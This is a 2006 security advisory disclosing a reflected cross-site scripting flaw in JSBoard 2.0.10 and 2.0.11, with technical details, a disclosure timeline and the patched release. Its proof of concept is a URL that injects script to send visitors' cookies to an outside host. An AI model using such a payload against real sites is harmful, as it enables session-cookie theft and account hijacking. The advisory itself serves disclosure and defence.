-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================
||| Security Advisory AKLINK-SA-2006-001 |||
||| CAN-2006-2109 (CVE candidate)        |||
============================================

JSBoard - Cross Site Scripting Attack
=====================================

Date released: 02.05.2006
Date reported: 30.04.2006
$Revision: 1.1 $

by Alexander Klink
   alexander@klink.name
   https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt
   (TLS certificate information: https://www.klink.name/tls.txt)
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109

Vendor: JoungKyun Kim (Open Source)
Product: JSBoard - a news and discussion web board popular in Korea
Website: http://jsboard.kldp.org
Vulnerability: Non-persistent XSS attack
Class: remote
Status: patched
Severity: low (possible disclosure of session and other cookies)
Releases known to be affected: 2.0.11, 2.0.10
Releases known NOT to be affected: 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

A non-persistent XSS attack can be carried out using variables that
are supposed to be from included files but can be overwritten using
variables defined in the CGI query.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

In the function parse_query_str() in include/print.php every variable
from the CGI request is set as a global variable, regardless of prior
use. As parse_query_str() is typically called after the inclusion of
other files that define variables which are not changed but output
in the rest of the program, this allows an attacker to inject XSS
code, for example Javascript.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of concept:

http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

None known.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 30.04.2006: Problem reported to author
* 30.04.2006: Author replies and releases patched version 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Install JSBoard 2.0.12, which fixes this particular attack vector.
Note that CGI query variables are still imported into the global
namespace, which means a similar problem might appear in a later version.
The patch is available from:
http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink (discovery)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv
Z7Jztkr1x7zn/uOaHy+rTSs=
=k/y4
-----END PGP SIGNATURE-----